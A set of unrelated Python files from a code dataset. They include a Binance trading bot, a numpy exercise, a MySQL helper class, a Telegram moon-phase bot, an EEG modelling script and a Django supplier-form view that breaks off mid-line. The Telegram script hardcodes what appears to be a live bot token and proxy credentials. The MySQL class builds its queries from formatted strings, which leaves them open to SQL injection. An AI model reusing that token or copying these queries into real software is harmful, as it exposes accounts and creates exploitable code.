msg_dict[\"interval\"] = self.interval\n msg_dict[\"bot_type\"] = self.type\n msg_dict[\"status\"] = self.status\n msg_dict[\"time\"] = datetime.now().strftime(Constants.STANDARD_DATE_FORMAT)\n msg_dict[\"current_price\"] = round(self.current_price, 4)\n msg_dict[\"current_amount\"] = round(self.current_amount, 4)\n indicators_info = {}\n if self.type == \"MFI\" and self.current_mfi is not None:\n indicators_info[\"current_mfi\"] = round(self.current_mfi, 4)\n\n if self.type == \"STDEV\" and self.current_mean is not None:\n indicators_info[\"current_mean\"] = round(self.current_mean, 4)\n indicators_info[\"current_stdev\"] = round(self.current_stdev, 4)\n threshold_price = self.current_mean - 2.25 * self.current_stdev\n indicators_info[\"threshold_price\"] = round(threshold_price, 4)\n indicators_info[\"threshold_gain\"] = round(\n ((self.current_price - threshold_price) / (self.current_mean - threshold_price)) * 100, 4)\n\n if indicators_info:\n msg_dict[\"indicators_info\"] = indicators_info\n\n producer.postMessage(\"heart_beat\", msg_dict)\n except:\n self.logger.exception(\"Error occured in TradingBot>sendheartBeat()\")\n\n def sendCurrentTransaction(self):\n try:\n\n if self.current_transaction is not None:\n PATH = \"C:\\\\Users\\\\171802\\\\PycharmProjects\\\\Binance\\\\venv\\\\MessageQueue\"\n mq = MQManager(PATH)\n exchange = mq.getExchange(\"Binance\")\n producer = exchange.getProducer()\n msg_dict = self.current_transaction.getDictionary()\n producer.postMessage(\"Transactions\", msg_dict)\n\n except:\n self.logger.exception(\"Error occured in TradingBot>sendCurrentTransaction()\")\n\n def loadFromJsonFile(self):\n try:\n # Leave if file does not exist\n if not os.path.isfile(self.save_file_path):\n self.logger.info(\"Save stat file not found\")\n return\n\n self.logger.info(\"Save stat file found, loading information from file\")\n dict = {}\n with open(self.save_file_path) as config_file:\n dict = json.load(config_file)\n\n if dict is None:\n return\n\n self.loadFromDictionary(dict)\n self.logger.info(\"Information loaded from save state file\")\n except:\n self.logger.exception(\"Error occured in TradigBot>loadFromJsonFile\")\n\n def setLogger(self):\n self.log_file_name = os.path.join(\"Logs\", self.id + \".txt\")\n self.logger.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')\n file_handler = logging.FileHandler(self.log_file_name)\n file_handler.setLevel(logging.INFO)\n file_handler.setFormatter(formatter)\n self.logger.addHandler(file_handler)\n\n stream_handler = logging.StreamHandler()\n stream_handler.setLevel(logging.DEBUG)\n stream_handler.setFormatter(formatter)\n self.logger.addHandler(stream_handler)\n\n # logging.basicConfig(filename=self.log_file_name,\n # level=logging.DEBUG,format='%(asctime)s %(levelname)s %(message)s')\n\n def stop(self):\n self.is_active = False\n self.save()\n self.deleteActiveFile()\n\n def run(self):\n try:\n print(\"Inside TradingBot>run\")\n self.createActiveFile()\n # self.publishToDesktop(self.id , \"Bot started\")\n self.logger.debug(\"Inside TradingBot>run\")\n self.save()\n if self.is_active == False:\n self.logger.info(\"Bot is inactive\")\n return\n\n while self.is_active == True:\n self.save()\n\n # Check if active file is present\n\n # When status is Searching - this function will call checkForBuy at specific interval\n # If MFI is more than 30 then check status every 5 mins to reduce log and unnecessary requests\n\n if self.type == \"MFI\" and self.status == \"SEARCHING\":\n self.checkForBuy_MFI()\n self.logger.info(\n self.id + \"Current status:{}, Price:{}, MFI:{}\".format(self.status, str(self.current_price),\n str(self.current_mfi)))\n time.sleep(120)\n\n elif self.type == \"MFI\" and self.status == \"BUY_WATCH\":\n self.checkForBuy_MFI()\n time.sleep(60)\n\n elif self.type == \"STDEV\" and self.status == \"SEARCHING\":\n\n self.checkForBuy_STDEV()\n self.logger.info(\n self.id + \"Current status:{}, Price:{}, Mean:{}, STDEV:{},Lower BB Band:{}\".format(self.status,\n str(\n self.current_price),\n str(\n self.current_mean),\n str(\n self.current_stdev),\n str(\n self.current_mean - 2 * self.current_stdev)))\n time.sleep(180)\n\n elif self.type == \"STDEV\" and self.status == \"BUY_WATCH\":\n\n self.checkForBuy_STDEV()\n self.logger.info(\n self.id + \"Current status:{}, Price:{}, Mean:{}, STDEV:{},Lower BB Band:{}\".format(\n self.status, str(self.current_price),\n str(self.current_mean), str(self.current_stdev),\n str(self.current_mean - 2 * self.current_stdev)))\n time.sleep(30)\n\n elif self.type == \"MA\" and self.status == \"SEARCHING\":\n self.checkForBuy_MA()\n time.sleep(30)\n\n # When status is Open -- this function will call check ForSale at specific interval\n elif self.status == \"OPEN\":\n self.checkforSell()\n\n # Send to Message Queue\n #self.sendCurrentTransaction()\n\n time.sleep(15)\n except:\n self.logger.exception(\"Error occured in TradingBot>Run\")\n\n def checkForBuy_MA(self):\n try:\n self.logger.debug(\"Inside TradingBot>checkForBuy_MA\")\n # Fetch candle stick data fron Binance API\n binance = BinacePublic()\n lst_candles = binance.getKlineCandles(self.pair, self.interval, None, None, 25)\n\n if self.last_buy_open_time is not None and self.last_buy_open_time == lst_candles[-1].openTime:\n self.logger.info(\"Coin was bought recently hence skipping\")\n return\n\n # Convert to list of standard OHLC\n lstOHLC = []\n for candle in lst_candles:\n ohlc = candle.ohlc\n lstOHLC.append(ohlc)\n\n lstOHLC2 = lstOHLC.copy()\n\n # Get MFI signal\n tc = Indicators()\n lstOHLC19 = tc.getMFI(lstOHLC, 19)\n #lstOHLC19.reverse()\n ma19_current = lstOHLC19[-1].mean\n ma19_previous = lstOHLC19[-2].mean\n\n lstOHLC13 = tc.getMFI(lstOHLC2, 13)\n #lstOHLC13.reverse()\n ma13_current = lstOHLC13[-1].mean\n ma13_previous = lstOHLC13[-2].mean\n # Update current price\n\n self.updatePrice(lstOHLC13[-1].close)\n if lstOHLC19[0].stdev == 0:\n s = 0\n else:\n s = (ma13_current - lstOHLC13[0].close) / lstOHLC13[0].stdev\n\n self.logger.info(\n self.id + \" Current MA13:\" + str(ma13_current) + \",MA19:\" + str(ma19_current)+\"MA19 price:\"+str(lstOHLC19[-1].close))\n if self.status == \"SEARCHING\":\n # MA 13 cross over MA 19 and value is not beyond upper limit of bollinger band\n if ma13_current > ma19_current and ma13_previous < ma19_previous and s > -1.5:\n self.buy(\"MA13 crossed MA19\")\n self.last_buy_open_time = lst_candles[-1].openTime\n\n\n\n\n except:\n self.logger.exception(\"Error occured in TradingBot>CheckForBuy_MA\")\n\n def checkForBuy_MFI(self):\n try:\n self.logger.debug(\"Inside TradingBot>CheckForBuy_MFI\")\n\n # Fetch candle stick data fron Binance API\n binance = BinacePublic()\n lst_candles = binance.getKlineCandles(self.pair, self.interval, None, None, 20)\n\n # Convert to list of standard OHLC\n lstOHLC = []\n for candle in lst_candles:\n ohlc = candle.ohlc\n lstOHLC.append(ohlc)\n\n # Get MFI signal\n tc = Indicators()\n lstOHLC = tc.getMFI(lstOHLC, 7)\n lstOHLC.reverse()\n now = datetime.now()\n\n # Update current and previous MFI prices\n if self.current_mfi is not None:\n self.previous_mfi = self.current_mfi\n\n self.current_mfi = lstOHLC[0].mfi\n if self.previous_mfi is None:\n self.previous_mfi = lstOHLC[1].mfi\n\n sig = MFISignal(now, self.previous_mfi, self.current_mfi, lstOHLC[0].close)\n self.logger.info(\n self.id + \" Current MFI:\" + str(self.current_mfi) + \",Previous MFI\" + str(self.previous_mfi))\n self.updatePrice(lstOHLC[0].close)\n\n if self.status == \"SEARCHING\" and self.current_mfi < 18:\n self.status = \"BUY_WATCH\"\n self.logger.info(\"Status changed to BUY_WATCH, current MFI:{}\".format(str(self.current_mfi)))\n return\n\n if self.status == \"BUY_WATCH\" and self.previous_mfi == 0.0 and self.current_mfi > 2:\n self.buy(\"MFI changed from ZERO to positive value\")\n\n # elif self.status == \"BUY_WATCH\" and sig.signalType == \"OVERSOLD-NORMAL\":\n elif self.status == \"BUY_WATCH\" and self.current_mfi > 20.0:\n self.buy(\"MFI signal:\" + sig.signalType)\n\n elif self.status == \"BUY_WATCH\" and self.current_mfi > 30.0:\n self.status = \"SEARCHING\"\n\n except:\n self.logger.exception(\"Error occured in TradingBot>CheckForBuy_MFI\")\n\n def checkForBuy_STDEV(self):\n try:\n self.logger.debug(\"Inside TradingBot>checkForBuy_SDEV\")\n # Fetch candle stick data fron Binance API\n binance = BinacePublic()\n lst_candles = binance.getKlineCandles(self.pair, self.interval, None, None, 25)\n\n # Convert to list of standard OHLC\n lstOHLC = []\n for candle in lst_candles:\n ohlc = candle.ohlc\n lstOHLC.append(ohlc)\n\n # Get SDEV\n tc = Indicators()\n lstOHLC = tc.getMFI(lstOHLC, 20)\n lstOHLC.reverse()\n now = datetime.now()\n\n self.updatePrice(lstOHLC[0].close)\n self.current_stdev = lstOHLC[0].stdev\n self.current_mean = lstOHLC[0].mean\n\n # Log current values\n self.logger.info(\n self.id + \" Current status:{}, Price:{}, Mean:{}, STDEV:{},Lower BB Band:{}\".format(self.status, str(\n self.current_price), str(self.current_mean), str(self.current_stdev), str(\n self.current_mean - 2 * self.current_stdev)))\n\n if self.status == 'SEARCHING' and self.current_price < self.current_mean - self.current_stdev * 2.5:\n self.status = \"BUY_WATCH\"\n self.buy_watch_lowest_price = self.current_price\n self.logger.info(\n \"Status changed to BUY_WATCH, current price: {}, Standard Deviation: {}, Mean {}\".format(\n str(self.current_price), str(lstOHLC[0].stdev), str(lstOHLC[0].mean)))\n return\n\n if self.status == 'SEARCHING' and lstOHLC[0].open - self.current_price > self.current_mean - self.current_stdev * 2.25:\n self.status = \"BUY_WATCH\"\n self.buy_watch_lowest_price = self.current_price\n self.logger.info(\n \"Status changed to BUY_WATCH, current price: {}, Standard Deviation: {}, Mean {}\".format(\n str(self.current_price), str(lstOHLC[0].stdev), str(lstOHLC[0].mean)))\n return\n\n if self.status == \"BUY_WATCH\" and self.current_price < self.buy_watch_lowest_price:\n self.buy_watch_lowest_price = self.current_price\n return\n\n if self.status == \"BUY_WATCH\" and self.current_price > self.buy_watch_lowest_price *1.01 :\n self.buy(\"current price is more than previous price\")\n\n # TODO: when bot is stopped and status = \"BUY_WATCH\" change status to searching\n # if no open transaction then change status to searching\n\n except:\n self.logger.exception(\"Error occured in TradingBot>checkForBuy_SDEV\")\n\n def checkforSell(self):\n try:\n logging.debug(\"Inside TradingBot>checkforSell\")\n if self.status != \"OPEN\":\n self.addDeicsionLog(\"ERROR\", \"No transaction to close\")\n return\n\n # Update current price\n binance = BinacePublic()\n # self.updatePrice(binance.getAveragePrice(self.pair))\n self.updatePrice(binance.getLatestPrice(self.pair))\n\n # If price falls below stop loss price then sell\n if self.current_price < self.current_stop_loss_price:\n self.addDeicsionLog(\"SELL\", \"Current price falls below Stop loss price\")\n self.sell(\"Current price falls below Stop loss price\")\n return\n\n # If price crosses take profit then enable trailing stop loss\n if (\n self.trailing_stop_loss_enabled is None or self.trailing_stop_loss_enabled == False) and self.current_price > self.current_take_profit_price:\n self.trailing_stop_loss_enabled = True\n self.current_stop_loss_price = self.current_price\n #self.current_stop_loss_price = self.current_price * (100 - self.trailing_Stop_loss) / 100\n self.addDeicsionLog(\"HOLD\",\n \"Trailing stoploss enabled,take_profit=\" + str(self.current_take_profit_price))\n return\n\n # If Trailing stop loss is enabled then update current stop loss price based on current price\n if self.trailing_stop_loss_enabled == True and self.current_price > self.previous_price:\n tmp_stop_loss_price = self.current_price * (100 - self.trailing_Stop_loss) / 100\n if tmp_stop_loss_price > self.current_stop_loss_price:\n self.current_stop_loss_price = tmp_stop_loss_price\n self.addDeicsionLog(\"HOLD\", \"Reset stoploss price to \" + str(self.current_stop_loss_price))\n return\n except:\n self.logger.exception(\"Error occured in TradingBot>chekForSell\")\n\n def updatePrice(self, current_price):\n if self.current_price == None:\n self.previous_price = current_price\n self.current_price = current_price\n else:\n self.previous_price = self.current_price\n self.current_price = current_price\n\n def sell(self, sell_reason):\n try:\n self.logger.debug(\"Inside TradingBot>Sell\")\n self.logger.info(\"SELL action , current price:\" + str(self.current_price))\n self.logger.info(\"SELL Reason:\" + sell_reason)\n\n # Execute sell order and get actual sell price\n bp = BinancePrivate()\n order_response = bp.order_market_sell(self.pair,self.base_quantity)\n sell_price = order_response[\"average_price\"]\n\n # Calculate current amount based on current price\n self.base_quantity = None\n self.current_transaction.closeTransaction(sell_price, datetime.now(), sell_reason)\n self.current_amount = self.current_amount + self.current_transaction.final_amount\n self.logger.info(json.dumps(self.current_transaction.getDictionary()))\n\n # Send to Message Queue\n # self.sendCurrentTransaction()\n\n # Add current trasaction to log\n self.updateTransactionLog()\n self.logger.info(\"SELL action, Quantity:{}, Sell Price:{}\".format(self.current_transaction.quantity,self.current_transaction.sell_price))\n # Reset parameters\n self.current_transaction = None\n self.current_stop_loss_price = None\n self.current_take_profit_price = None\n self.trailing_stop_loss_enabled = None\n self.status = \"SEARCHING\"\n #self.publishToDesktop(self.id + \" - SELL Action\",\"Reason:{}, Current amount:{}\".format(sell_reason, sell_price))\n\n except:\n self.logger.exception(\"Error occured in TradingBot>Sell\")\n\n def updateTransactionLog(self):\n key = self.current_transaction.buy_time.strftime(Constants.STANDARD_DATE_FORMAT)\n self.dict_transaction_log[key] = self.current_transaction.getDictionary()\n\n def buy(self, buy_reason):\n try:\n self.logger.debug(\"Inside TradingBot>buy\")\n # Fetch candle stick data fron Binance API\n binance = BinacePublic()\n self.updatePrice(binance.getLatestPrice(self.pair))\n\n self.logger.info(\"BUY action , current price:\" + str(self.current_price))\n # Always buy with 80% of current amount to cover fees\n max_Available_for_buy = self.current_amount * 0.8\n self.base_quantity = max_Available_for_buy / self.current_price\n\n self.logger.info(\"BUY Action, Quantity: {}\".format(self.base_quantity))\n # Send request to buy\n # TODO: Add functionality to actual buy\n bp = BinancePrivate()\n order_response = bp.order_market_buy(self.pair,self.base_quantity)\n buy_price = order_response[\"average_price\"]\n self.base_quantity = order_response[\"total_quantity\"]\n\n # Get actual price\n\n # Update actualprice, currentAmpunt and status\n trans_dict = {}\n trans_dict[\"pair\"] = self.pair\n trans_dict[\"key\"] = self.pair + self.interval + datetime.now().strftime(Constants.STANDARD_DATE_FORMAT)\n trans_dict[\"quantity\"] = self.base_quantity\n trans_dict[\"buy_time\"] = datetime.now().strftime(Constants.STANDARD_DATE_FORMAT)\n #trans_dict[\"buy_price\"] = self.current_price\n trans_dict[\"buy_price\"] = buy_price\n trans_dict[\"buy_reason\"] = buy_reason\n self.current_transaction = Transaction()\n self.current_transaction.loadFromDictionary(trans_dict)\n\n self.current_amount = self.current_amount - self.base_quantity * self.current_price - self.current_transaction.buy_fees\n self.current_stop_loss_price = self.current_price * (100 - self.stop_loss) / 100\n self.current_take_profit_price = self.current_price * (100 + self.take_profit) / 100\n self.logger.info(\"BUY action , actual buy price:{}\".format( buy_price))\n self.status = \"OPEN\"\n #self.publishToDesktop(self.id + \" - BUY Action\", buy_reason)\n except:\n self.logger.exception(\"Error occured in TradingBot>buy\")\n\n def addDeicsionLog(self, decision, msg):\n decision = decision_logEntry(self.current_price, decision, msg)\n self.decision_log.append(decision)\n pass\n\n def save(self):\n try:\n # convert to JSON string\n dict = self.getDictionary()\n\n with open(self.save_file_path, 'w') as outfile:\n json.dump(dict, outfile, indent=4)\n\n # self.sendHeartBeat()\n except:\n self.logger.exception(\"Error occured in TradingBot>save()\")\n\n def getDictionary(self):\n try:\n dict = {}\n dict[\"update_time\"] = datetime.now().strftime(Constants.STANDARD_DATE_FORMAT)\n dict[\"type\"] = self.type\n dict[\"status\"] = self.status\n dict[\"base_symbol\"] = self.base_symbol\n dict[\"quote_symbol\"] = self.quote_symbol\n dict[\"interval\"] = self.interval\n dict[\"is_active\"] = self.is_active\n dict[\"initial_amount\"] = self.initial_amount\n dict[\"current_amount\"] = self.current_amount\n dict[\"base_quantity\"] = self.base_quantity\n dict[\"current_price\"] = self.current_price\n dict[\"previous_price\"] = self.previous_price\n dict[\"current_mfi\"] = self.current_mfi\n dict[\"current_stdev\"] = self.current_stdev\n dict[\"current_mean\"] = self.current_mean\n dict[\"log_file_name\"] = self.log_file_name\n\n dict[\"stop_loss\"] = self.stop_loss\n dict[\"take_profit\"] = self.take_profit\n dict[\"trailing_stop_loss\"] = self.trailing_Stop_loss\n\n if self.current_stop_loss_price is not None:\n dict[\"current_stop_loss_price\"] = self.current_stop_loss_price\n dict[\"current_take_profit_price\"] = self.current_take_profit_price\n dict[\"trailing_stop_loss_enabled\"] = self.trailing_stop_loss_enabled\n\n if self.current_transaction is not None:\n dict[\"current_transaction\"] = self.current_transaction.getDictionary()\n\n if self.dict_transaction_log is not None:\n dict[\"transaction_log\"] = self.dict_transaction_log\n\n return dict\n except:\n self.logger.exception(\"Error occured in TradingBot>getDictionary()\")\n\n def publishToDesktop(self, title, msg):\n notification.notify(\n # title of the notification,\n title=\"{} notification on {}\".format(title, datetime.now()),\n # the body of the notification\n message=msg,\n # creating icon for the notification\n # we need to download a icon of ico file format\n # app_icon = \"Paomedia-Small-N-Flat-Bell.ico\",\n # the notification stays for 50sec\n timeout=50\n )\n\n def createActiveFile(self):\n f = open(self.active_file_path, \"w\")\n f.write(self.id)\n f.close()\n\n def checkActiveFile(self):\n if os.path.exists(self.active_file_path):\n self.is_active = True\n else:\n self.is_active = False\n\n def deleteActiveFile(self):\n os.remove(self.active_file_path)\n\n\nif __name__ == \"__main__\":\n PATH = \"/Users/akshaykadu/PycharmProjects/Binance/venv/MessageQueue\"\n# mq = MQManager(PATH)\n# exchange = mq.getExchange(\"Binance\")\n# producer = exchange.getProducer()\n\n# TODO : Ability to start and stop Bot\n# TODO : Stop bot if loss in 3 consecutive transactions or current amount falls below 80% of initial amount\n# TODO : Rotating log file handler\n","sub_path":"TradingBot.py","file_name":"TradingBot.py","file_ext":"py","file_size_in_byte":29998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"127266498","text":"__author__ = [\"nawook96(신동욱)\", \"JHyunB(백종현)\"]\n'''\n 분포를 통해 랜덤 배열을 만들고 계산 후 파일 입출력.\n'''\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nt = np.array([[1,2],[3,4]])\nprint(np.vsplit(t,2))#\nexit(-1)\nmean = 0 #평균\nstd = 5 #표준편차\narr1 = np.random.normal(mean, std, [5, 5]) #정규분포\narr2 = np.random.exponential(2, [5, 5]) #지수분포\narr3 = arr1 * arr2\nprint(arr3)\nnp.save(\"./data\", arr3) # data.npy로 저장\n\narr = np.load(\"./data.npy\") # 불러오기\ndevArr = np.vsplit(arr, 5) # 가로로 자르기\nprint(devArr[0][0])\nplt.plot(devArr[0][0]) # 그래프그리기\nplt.show()\n","sub_path":"1week/백종현, 신동욱_01_numpy.py","file_name":"백종현, 신동욱_01_numpy.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"460144912","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport pymysql\nimport time\n\nfrom .redis_timers import RedisTimer\n\ndict_hour = {'00': 'zero', '01': 'one', '02': 'two', '03': 'three', '04': 'four', '05': 'five', '06': 'six',\n '07': 'seven', '08': 'eight', '09': 'nine', '10': 'ten', '11': 'eleven', '12': 'twelve', '13': 'thirteen',\n '14': 'fourteen', '15': 'fifteen', '16': 'sixteen',\n '17': 'seventeen', '18': 'eighteen', '19': 'nineteen', '20': 'twenty', '21': 'twenty_one',\n '22': 'twenty_two', '23': 'twenty_three'}\n\n\nclass Mysql:\n def __init__(self):\n # 打开数据库连接\n self.db = pymysql.connect(\"localhost\", \"root\", \"root\", \"smart\", charset='utf8')\n # 使用 cursor() 方法创建一个游标对象 cursor\n self.cursor = self.db.cursor()\n\n def update_timer_status(self, id, hub_id, status):\n sql = \"UPDATE smart_timers SET status = '{}' WHERE `id` = '{}' AND `hub_id` = '{}'\".format(status, id, hub_id)\n try:\n self.cursor.execute(sql)\n self.db.commit()\n except:\n # 发生错误时回滚\n self.db.rollback()\n\n def update_hour_spare(self, hub_id, column, value):\n sql = \"UPDATE smart_hour_spare SET `{}` = '{}' WHERE `hub_id` = '{}'\".format(column, value, hub_id)\n try:\n self.cursor.execute(sql)\n self.db.commit()\n except:\n self.db.rollback()\n\n def reset_hour_spare(self, hub_id):\n # 直接删掉旧的记录,再重建一条记录\n sql = \"DELETE FROM smart_hour_spare WHERE `hub_id` = '{}'\".format(hub_id)\n try:\n self.cursor.execute(sql)\n self.db.commit()\n except:\n self.db.rollback()\n\n sql = \"INSERT INTO smart_hour_spare(hub_id) VALUES ('{}')\".format(hub_id)\n try:\n self.cursor.execute(sql)\n self.db.commit()\n except:\n self.db.rollback()\n\n def update_month_spare(self, hub_id, current_hour):\n column = dict_hour[current_hour]\n select_hour_sql = \"SELECT `{}` FROM smart_hour_spare WHERE `hub_id` = '{}'\".format(column, hub_id)\n try:\n self.cursor.execute(select_hour_sql)\n watt = self.cursor.fetchone()[0]\n except Exception as e:\n print(e)\n return\n # 顺便更新当前月份\n current_month = int(time.strftime('%m', time.localtime(time.time())))\n sql = \"UPDATE smart_month_spare SET `watt` = smart_month_spare.watt+'{}', `current_month` = '{}' WHERE `hub_id` = '{}'\" \\\n .format(watt, current_month, hub_id)\n try:\n self.cursor.execute(sql)\n self.db.commit()\n except Exception as e:\n print(e)\n self.db.rollback()\n\n def get_all_timer_by_status(self, status):\n sql = \"SELECT * FROM smart_timers WHERE `status` = '{}'\".format(status)\n try:\n self.cursor.execute(sql)\n results = self.cursor.fetchall()\n timer_list = []\n for row in results:\n id = row[0]\n hub_id = row[1]\n name = row[2]\n power = row[3]\n repeat = row[4]\n time = row[5]\n status = row[6]\n timer = RedisTimer(id=id, hub_id=hub_id, repeat=repeat, time=time, power=power, status=status)\n timer_list.append(timer)\n # print(\"id=%s, hub_id=%s, name=%d, power=%s, repeat=%d, time=%d, status=%d\" % (id, hub_id, name, power, repeat, time, status))\n return timer_list\n except:\n # print(\"Error: unable to fetch data\")\n return\n\n def __del__(self):\n # 关闭数据库连接\n self.db.close()\n","sub_path":"app/tools/mysql.py","file_name":"mysql.py","file_ext":"py","file_size_in_byte":3800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"554330593","text":"from telegram.ext import Updater , CommandHandler , MessageHandler, Filters \nimport ephem\nfrom datetime import datetime, date, timedelta\n\nPROXY = {'proxy_url': 'socks5://t1.learn.python.ru:1080',\n 'urllib3_proxy_kwargs': {'username': 'learn', 'password': 'python'}}\n\nimport logging\nlogging.basicConfig(format='%(name)s - %(levelname)s - %(message)s',\n level=logging.INFO,\n filename='bot.log'\n )\n\ndef main():\n mybot = Updater(\"958204140:AAHA21y19NDgyyzTYNJH4WsqQ9mfvY1X-3c\", request_kwargs=PROXY)\n dp = mybot.dispatcher\n dp.add_handler(CommandHandler(\"next_full_moon\", greet_user))\n dp.add_handler(MessageHandler(Filters.text, talk_to_me))\n mybot.start_polling()\n mybot.idle()\n\n\ndef greet_user(bot, update):\n\n user_text = update.message.text\n user_text=user_text.split()\n user_text=user_text[1]\n print(user_text)\n a=ephem.next_full_moon(user_text)\n print(a)\n \n update.message.reply_text(f'Ближайшее полнолуние будет: {a}')\n \n\n\n\n\ndef talk_to_me(bot, update):\n user_text = update.message.text \n print(user_text)\n update.message.reply_text(user_text)\n\nmain()","sub_path":"bot_moon.py","file_name":"bot_moon.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"263693082","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\ndef convert (string): # code to convert string to list\n li = list(string.split())\n return li\n\n\n# In[2]:\n\n\ntext = input(\"Enter a Secentence : \") # reads input from user\n\n\n# In[3]:\n\n\nk = [] # creating an empty list\nL = '' # creating an empty string\n\n\n# In[4]:\n\n\nk = convert(text) # converts string to list\n\n\n# In[5]:\n\n\nprint(k) # prints the converted list\n\n\n# In[6]:\n\n\n# appends 's' to python and converts list back to string and prints the string\nfor j in k:\n if j == 'Python':\n j = convert(j)\n j.append('s')\n j = ''.join(map(str,j))\n L +=j+' '\nprint(L)\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"icp1_Q3.py","file_name":"icp1_Q3.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"17217100","text":"import re\nimport sys\nimport os\nimport numpy as np\nfrom natsort import natsorted\nimport math\nsys.path.append('..')\nimport fragility\nfrom datainterface.loadpatient import LoadPat\n\n# multirpocessing unit\nfrom fragility.preprocess.filters import FilterLinearNoise\nfrom fragility.execute.singlecore.singlemvar import SingleMvar\n\n\ndef computenumwins(raweeg, winsize, stepsize, samplefreq):\n # get number of channels and samples in the raw data\n numchans, numsignals = raweeg.shape\n\n # get number of samples in a window\n numwinsamps = winsize * int(samplefreq) / 1000\n # get number of samples in a step\n numstepsamps = stepsize * int(samplefreq) / 1000\n\n # get number of complete windows in raw data\n numwins = int(\n math.floor(\n numsignals /\n numstepsamps -\n numwinsamps /\n numstepsamps +\n 1))\n return numwins\n\n\nif __name__ == '__main__':\n # extract passed in variable\n modeltype = int(sys.argv[1])\n patient = str(sys.argv[2]).lower()\n winsize = int(sys.argv[3])\n stepsize = int(sys.argv[4])\n\n rawdatadir = str(sys.argv[5])\n tempdatadir = str(sys.argv[6])\n outputdatadir = str(sys.argv[7])\n\n # use bipolar schema?\n BIPOLAR = False\n if BIPOLAR:\n reference = 'bipolar'\n else:\n reference = None\n ################################### 1. SET DATA, OUTPUT AND TEMPDIR ######\n # rawdatafile and processed data files\n datadir = os.path.join(rawdatadir)\n\n # output file name\n tempresultsdir = os.path.join(tempdatadir, 'mvar', patient)\n if not os.path.exists(tempresultsdir):\n os.makedirs(tempresultsdir)\n metafilename = os.path.join(tempresultsdir, '_meta' + patient)\n\n def get_tempfilename(tempfilename): return os.path.join(\n tempresultsdir, tempfilename)\n\n ################################### 2. EXTRACT DATA AND PREPROCESS #######\n # get a list of all the sorted files in our temporary direcotry\n tempfiles = os.listdir(tempresultsdir)\n tempfiles = natsorted(tempfiles)\n\n # load raw data and other relevant channel data\n dataloader = LoadPat(patient=patient, datadir=rawdatadir)\n rawdata = dataloader.loadrawdata_fromfile(reference=reference)\n included_chans = dataloader.included_chans\n chanlabels = dataloader.chanlabels[dataloader.included_chans]\n samplerate = dataloader.samplerate\n\n # instantiate a mvarmodel object\n mvarmodel = SingleMvar(winsize, stepsize, samplerate)\n mvarmodel.settempdir(tempresultsdir)\n\n ###################### 1b. PREPROCESS FILTERING ####################\n freqrange = [0.1, 499] # FREQ RANGE TO BANDPASS\n linefreq = 60 # LINE NOISE OF HZ IN USA\n noisemodel = FilterLinearNoise(samplerate=samplerate)\n # seegts = noisemodel.filter_rawdata(seegts, freqrange)\n rawdata = noisemodel.notchlinenoise(rawdata, freq=linefreq)\n\n savemeta = True\n try:\n tempfiles.remove('_meta' + patient + '.npz')\n # savemeta = False\n except BaseException:\n sys.stdout.write('cant remove metafilename')\n\n # COMPUTE REST OF WINDOWS\n # compute number of windows based on the time series data\n numwins = computenumwins(rawdata, winsize, stepsize, samplerate)\n if numwins != len(tempfiles) - 1: # and len(tempfiles) >= numwins - 200:\n # if numwins does not match, get list of wins not completed\n totalwins = np.arange(0, numwins, dtype='int')\n tempfiles = np.array(tempfiles)[:, np.newaxis]\n\n # patient+'_'+str(iwin) = the way files are named\n tempwins = np.apply_along_axis(\n lambda a: int(\n a[0].split(\n patient +\n '_')[1].split('.')[0]),\n 1,\n tempfiles)\n winstoanalyze = list(set(totalwins) - set(tempwins))\n\n # loop through windows still needed to analyze\n for iwin in winstoanalyze:\n # temporary filename to be saved for mvar run\n outputfilename = get_tempfilename(\n patient + '_' + str(iwin) + '.npz')\n adjmat = mvarmodel.runmvarsingle(rawdata, iwin, normalize=False)\n\n if iwin == 0 or savemeta:\n # save the timepoints, included channels used, parameters\n np.savez(metafilename, chanlabels=chanlabels,\n timepoints=mvarmodel.timepoints,\n winsize=winsize,\n stepsize=stepsize,\n includedchans=included_chans,\n samplerate=samplerate)\n sys.stdout.write('Saved meta data for ' + patient)\n\n # save adjacency matrix\n np.savez(outputfilename, adjmat=adjmat)\n sys.stdout.write('Saved single core mvar model ' + str(iwin))\n","sub_path":"__old/bin/fixjobs/_slurm_run_mvarmodel.py","file_name":"_slurm_run_mvarmodel.py","file_ext":"py","file_size_in_byte":4784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"114872829","text":"# -*- coding: utf-8 -*- \nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom django.shortcuts import get_object_or_404\nfrom django.core.files.storage import FileSystemStorage\nfrom rest_framework.parsers import MultiPartParser, FileUploadParser,FormParser\nfrom rest_framework import status, generics, permissions, viewsets\nfrom mail import send_mail\n\n\nfrom .serializers import *\n\nfrom .models import *\nfrom django.shortcuts import render\n\nfrom main_page.models import CompanyInformation\nfrom main_page.serializers import Comp_Inf_Serializer\n\n# Create your views here.\nclass Profile_SupplierView(APIView):\n def get(self, request):\n objects = Profile_Supplier.objects.all()\n serializer = Profile_Supplier_Serializer(objects, many=True)\n return Response({\"profile-supplier\": serializer.data})\n\n def post(self, request):\n objects = request.data.get('profile-supplier')\n serializer = Profile_Supplier_Serializer(data=objects)\n if serializer.is_valid(raise_exception=True):\n serializer.save()\n body = ' Наименование компаний: '+serializer.data.get('company_name') + '\\n Вид деятелности: '+ serializer.data.get('type_activity') + ' \\n Страна-производитель: '+ serializer.data.get('country') + ' \\n ФИО: '+ serializer.data.get('fio') + ' \\n Телефон: '+ serializer.data.get('phone') + ' \\n E-mail: ' + serializer.data.get('mail') + ' \\n Коментарий: ' + serializer.data.get('comment') + ' 